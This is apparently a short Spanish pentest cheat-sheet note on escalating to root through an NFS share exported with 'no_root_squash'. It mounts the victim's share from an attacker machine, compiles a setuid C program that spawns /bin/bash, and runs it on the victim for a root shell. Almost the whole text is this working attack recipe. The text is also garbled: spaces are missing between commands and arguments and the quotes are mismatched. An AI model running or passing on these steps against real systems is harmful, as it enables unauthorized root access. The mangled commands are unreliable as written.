cat/etc/exports#Si una carpeta tiene la flag “no_root_squash” se puede montar con NFS y los archivos serán creados como root (id 0)#Desde la máquina atacanteshowmount-e<IP_VÍCTIMA>mkdir/tmp/mountmemount-orw,vers=2<IP_VÍCTIMA>:/tmp/tmp/mountmeecho'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ > /tmp/mountme/x.cgcc /tmp/mountme/x.c -o /tmp/mountme/xchmod +s /tmp/mountme/x#Desde la máquina víctima./x
